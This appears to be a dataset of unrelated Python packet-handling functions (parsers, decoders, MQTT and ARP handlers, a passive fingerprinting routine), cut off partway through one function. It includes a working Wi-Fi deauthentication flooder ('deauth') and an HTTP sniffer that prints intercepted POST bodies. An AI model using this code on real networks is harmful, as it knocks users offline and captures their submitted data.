-> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def read_packet(self):\n\n\t\t#self.debug(\"READ BUFFER SIZE: %d\" % len(self.buff))\n\t\tbackup = self.buff[:]\n\t\tpacket = Packet()\n\t\ttry:\n\t\t\tpacket.direction = self.node\n\t\t\tpacket.ident = self.unpack('ubyte')\n\t\t\t\n\t\t\t#Defined structs from huge dict\n\t\t\tfor datatype, name in self.get_struct(packet):\n\t\t\t\t# this populates packet.data with {name: value}\n\t\t\t\tpacket.data[name] = self.unpack(datatype)\n\n\t\t\t# I believe the following are packet-type specific fixes for variable-length packets.\n\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tpacket.data['x2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['y2'] = self.unpack('short')\n\t\t\t\t\tpacket.data['z2'] = self.unpack('short')\n\t\t\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data'] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = self.unpack_array_fast('short', packet.data['data_size'])\n#\t\t\t\tbtype = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tmetadata = self.unpack_array_fast('byte', packet.data['data_size'])\n#\t\t\t\tpacket.data[\"blocks\"] = []\n#\t\t\t\tfor i in zip(coords, btype, metadata):\n#\t\t\t\t\tblock = {}\n#\t\t\t\t\tblock[\"x\"] =\t\ti[0] >> 12\n#\t\t\t\t\tblock[\"z\"] = 0x0F & i[0] >> 8\n#\t\t\t\t\tblock[\"y\"] = 0xFF & i[0]\n#\t\t\t\t\tblock[\"type\"] = i[1]\n#\t\t\t\t\tblock[\"metadata\"] = i[2]\n#\t\t\t\t\tpacket.data[\"blocks\"].append(block)\n#\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\trecords = self.unpack_array_fast('byte', packet.data['data_size']*3)\n\t\t\t\ti = 0\n\t\t\t\tpacket.data[\"blocks\"] = []\n\t\t\t\twhile i < packet.data['data_size']*3:\n\t\t\t\t\tpacket.data[\"blocks\"].append(dict(zip(('x','y','z'), records[i:i+3])))\n\t\t\t\t\ti+=3\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data[\"slots_data\"] = self.unpack_array('slot', packet.data[\"data_size\"])\n\t\t\t\tdel packet.data[\"data_size\"]\n\t\t\t#0x82:\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tpacket.data[\"text\"] = []\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"text\"].append(packet.data[\"line_%s\" % (i+1)])\n\t\t\t\t\t\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data[\"data\"] = self.unpack_array_fast('byte', packet.data['data_size'])\n\t\t\t\tdel packet.data[\"data_size\"]\n\n\t\t\t# Sets packet.original to the byte string that the packet was decoded from.\n\t\t\tpacket.original = backup[:len(backup) - len(self.buff)]\n\n\t\t\treturn packet\n\n\t\texcept IncompleteData:\n\t\t\tself.buff = backup\n\t\t\treturn None\n\t\texcept Exception, ex:\n\t\t\tself.buff = backup\n\t\t\tex.args += (self.buff[20:],)\n\t\t\traise", "def read_raw_packet(self):\n\n size = 0\n\n # Read our two-byte header from the debugger...\n while not size:\n size = (self._get_next_byte() << 16) | self._get_next_byte()\n\n # ... and read our packet.\n packet = bytearray([self._get_next_byte() for _ in range(size)])\n\n # Return our packet.\n # TODO: extract and provide status flags\n # TODO: generate a timestamp on-device\n return packet, datetime.now(), None", "def next_connection_packets(piter, linktype=1):\n first_ft = None\n\n for ts, raw in piter:\n ft = flowtuple_from_raw(raw, linktype)\n if not first_ft: first_ft = ft\n\n sip, dip, sport, dport, proto = ft\n if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)):\n break\n\n yield {\n \"src\": sip, \"dst\": dip, \"sport\": sport, \"dport\": dport, \"proto\": proto,\n \"raw\": payload_from_raw(raw, linktype).encode(\"base64\"), \"direction\": first_ft == ft,\n }", "def get_packet_type(pkt: packet.Packet) -> dict:\n\n pkt_metadata = {}\n pkt_metadata[\"type\"] = \"unsupported\"\n\n for index, protocol in enumerate(pkt.protocols, start=0):\n if type(protocol) == ipv4.ipv4:\n pkt_metadata[\"ipv4\"] = index\n pkt_metadata[\"ipv4_src\"] = protocol.src\n pkt_metadata[\"ipv4_dst\"] = protocol.dst\n elif type(protocol) == tcp.tcp:\n pkt_metadata[\"type\"] = \"tcp\"\n pkt_metadata[\"tcp\"] = index\n pkt_metadata[\"transport_layer\"] = index # Works for both TCP and UDP\n pkt_metadata[\"src_port\"] = protocol.src_port\n pkt_metadata[\"dst_port\"] = protocol.dst_port\n elif type(protocol) == udp.udp:\n pkt_metadata[\"type\"] = \"udp\"\n pkt_metadata[\"udp\"] = index\n pkt_metadata[\"transport_layer\"] = index # Works for both TCP and UDP\n pkt_metadata[\"src_port\"] = protocol.src_port\n pkt_metadata[\"dst_port\"] = protocol.dst_port\n elif type(protocol) == icmp.icmp:\n pkt_metadata[\"type\"] = \"icmp\"\n pkt_metadata[\"icmp\"] = index\n pkt_metadata[\"icmp_type\"] = protocol.type\n pkt_metadata[\"icmp_code\"] = protocol.code\n\n return pkt_metadata", "def decode_packet(self, bytes):\n b64 = False\n if not isinstance(bytes, six.binary_type):\n bytes = bytes.encode('utf-8')\n\n packet_type = six.byte2int(bytes[0:1])\n if packet_type == ord('b'):\n binary = True\n bytes = bytes[1:]\n packet_type = int(chr(six.byte2int(bytes[0:1])))\n b64 = True\n elif packet_type >= ord('0'):\n packet_type = int(chr(packet_type))\n binary = False\n else:\n binary = True\n\n packet_data = None\n if len(bytes) > 1:\n if binary:\n if b64:\n packet_data = base64.b64decode(bytes[1:])\n else:\n packet_data = bytes[1:]\n else:\n packet_data = bytes[1:].decode('utf-8')\n\n return Packet(packet_type, packet_data, binary)", "def create_packet_definition(packet_to_send):\n source_mac = \"00:00:00:00:00:01\"\n destination_mac = \"00:00:00:00:00:02\"\n source_ip = \"10.10.10.1\"\n destination_ip = \"10.10.10.2\"\n source_ip6 = 'fe80::214:f2ff:fe07:af0'\n destination_ip6 = 'ff02::1'\n sport = 1\n dport = 2\n tos = 4\n if packet_to_send[\"type\"] == \"ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n {\"TCP\": {}})\n elif packet_to_send[\"type\"] == \"tagged_ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"vlan\"],\n \"prio\": packet_to_send[\"priority\"]}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}})\n elif packet_to_send[\"type\"] == \"tcp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n {\"TCP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"udp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}},\n {\"UDP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"double_tagged_ip\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"outer_vlan\"], \"type\": 0x8100,\n \"prio\": packet_to_send[\"outer_priority\"]}},\n {\"Dot1Q\": {\"vlan\": packet_to_send[\"inner_vlan\"], \"type\": 0x0800,\n \"prio\": packet_to_send[\"inner_priority\"]}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"tos\": tos}})\n elif packet_to_send[\"type\"] == \"arp\":\n packet_definition = (\n {\"Ether\": {\"src\": source_mac, \"dst\": 'FF:FF:FF:FF:FF:FF', \"type\": 0x0806}},\n {\"ARP\": {\"op\": 1, \"hwsrc\": source_mac,\n \"psrc\": source_ip, \"pdst\": destination_ip}},)\n elif packet_to_send[\"type\"] == \"arp_reply_tagged\":\n packet_definition = ({\"Ether\": {\"src\": source_mac, \"dst\": destination_mac, \"type\": 0x8100}},\n {\"Dot1Q\": {\"vlan\": 2}},\n {\"ARP\": {\"op\": 2, \"hwsrc\": source_mac, \"hwdst\": destination_mac,\n \"pdst\": destination_ip, \"psrc\": source_ip}}, )\n elif packet_to_send[\"type\"] == \"icmp\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x0800}},\n {\"IP\": {\"dst\": destination_ip, \"src\": source_ip, \"proto\": 1}},\n {\"ICMP\": {\"type\": 8, \"code\": 0}})\n elif packet_to_send[\"type\"] == \"ipv6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"plen\": 64, \"tc\": 225}})\n elif packet_to_send[\"type\"] == \"tcp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 6}},\n {\"TCP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"udp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 17}},\n {\"UDP\": {\"sport\": sport, \"dport\": dport}})\n elif packet_to_send[\"type\"] == \"icmp6\":\n packet_definition = ({\"Ether\": {\"dst\": destination_mac, \"src\": source_mac, \"type\": 0x86dd}},\n {\"IPv6\": {\"dst\": destination_ip6, \"src\": source_ip6, \"version\": 6,\n \"hlim\": 255, \"tc\": 224, \"nh\": 1}},\n {\"ICMP\": {\"type\": 8, \"code\": 0}})\n return packet_definition", "def _scapy_parse(packet: dict) -> Packet:\n try:\n payload_base64 = packet['packet']['payload'].encode()\n\n # assuming it has a Ethernet layer. Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]", "def packet_decoder(packet_type,string):\n dct = json.loads(string)\n if packet_type == HS_Version:\n return HS_Version(dct['version'])\n if packet_type == HS_Options:\n return HS_Options(minport=dct['minport'], maxport=dct['maxport'],\n portusage=dct['portusage'], protocol=dct['protocol'],\n timeout=dct['timeout'], payload=dct['payload'],\n key=dct['key'])\n if packet_type == Data:\n return Data(data=dct['data'], terminate=int(dct['terminate']))\n if packet_type == Management:\n return Management(dct['command'],location=dct['location'])\n if packet_type == Switching:\n return Switching(dct['status'])\n if packet_type == Error:\n return Error()", "def spoof_packet(packet):", "def arp_parse(data):\n\t# Iteratize pkt\n\tpkt = packet.Packet(data)\n\ti = iter(pkt)\n\teth_pkt = next(i)\n\t\t# Ensure it's an ethernet frame.\n\tassert isinstance(eth_pkt, ethernet.ethernet)\n\n\tarp_pkt = next(i)\n\tif not isinstance(arp_pkt, arp.arp):\n\t\traise ARPPacket.ARPUnknownFormat()\n\n\tif arp_pkt.opcode not in (ARP_REQUEST, ARP_REPLY):\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported opcode %d' % arp_pkt.opcode)\n\n\tif arp_pkt.proto != ETH_TYPE_IP:\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported arp ethtype 0x%04x' % arp_pkt.proto)\n\n\treturn arp_pkt", "def gen_raw_from_broadlink(data):\n v = iter(data)\n code = next(v)\n next(v) # repeat\n\n assert code == 0x26 # IR\n\n length = int.from_bytes(islice(v, 2), byteorder='little')\n assert length >= 3 # a At least trailer\n \n def decode_one(x):\n return round(x * 8192 / 269, 0)\n\n def decode_iter(x):\n sign = 1\n while True:\n try:\n d = next(x)\n except StopIteration:\n return\n if d == 0:\n d = int.from_bytes(islice(x, 2), byteorder='big')\n \n yield sign * decode_one(d)\n sign = sign * -1\n \n yield from decode_iter(islice(v, length))\n\n rem = list(v)\n if any(rem):\n LOG.warning(\"Ignored extra data: %s\", rem)", "def deauth(self):\n # https://man7.org/linux/man-pages/man7/packet.7.html\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)\n s.bind((self.interface, 0))\n\n # The RadioTap version is always 0\n rt_version = 0\n # The padding is always 0\n rt_padding = 0\n # The empty RadioTap frame has length of 8 bytes\n rt_length = 8\n # The RadioTap flags are irrelevant\n rt_flags = 0 \n # Construct the empty RadioTap frame (1,1,2,4 bytes)\n # https://docs.python.org/3/library/struct.html\n rt_frame = struct.pack(\n 'BBHI',\n rt_version,\n rt_padding,\n rt_length,\n rt_flags\n )\n\n # The 802.11 de-authentication subtype(4bits), type(2bits), version(2bits)\n dot11_type = int(b'11000000', 2)\n # The 802.11 flags are irrelevant\n dot11_flags = 0 \n # The 802.11 duration is irrelevant\n dot11_dur = 0\n # The 802.11 receiver address\n dot11_ra = bytes(map(lambda x: int(x, 16) , self.target_addr.split(':')))\n # The 802.11 transmitter address\n dot11_ta = bytes(map(lambda x: int(x, 16) , self.access_point.split(':')))\n # The 802.11 access point address\n dot11_ap = dot11_ta\n # The 802.11 sequence control is irrelevant\n dot11_sc = 0\n # The 802.11 reason code is irrelevant (0 is fine)\n dot11_reason = 0\n # Construct the 802.11 frame (1,1,2,6,6,6,2,2 bytes)\n # https://docs.python.org/3/library/struct.html\n dot11_frame = struct.pack(\n 'BBH6s6s6sHH',\n dot11_type,\n dot11_flags,\n dot11_dur,\n dot11_ra,\n dot11_ta,\n dot11_ap,\n dot11_sc,\n dot11_reason\n )\n\n # Construct the full payload (RadioTap + 802.11)\n payload = rt_frame + dot11_frame \n\n # Send packets while running and sending\n while 1:\n while self.sending:\n s.send(payload)\n time.sleep(1)", "def _finalize_packet(self, rudp_packet):\n return rudp_packet.to_bytes()", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def decode_raw(input_bytes,\n out_type,\n little_endian=True,\n fixed_length=None,\n name=None):\n if fixed_length is not None:\n return gen_parsing_ops.decode_padded_raw(\n input_bytes,\n fixed_length=fixed_length,\n out_type=out_type,\n little_endian=little_endian,\n name=name)\n else:\n return gen_parsing_ops.decode_raw(\n input_bytes, out_type, little_endian=little_endian, name=name)", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. \n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or 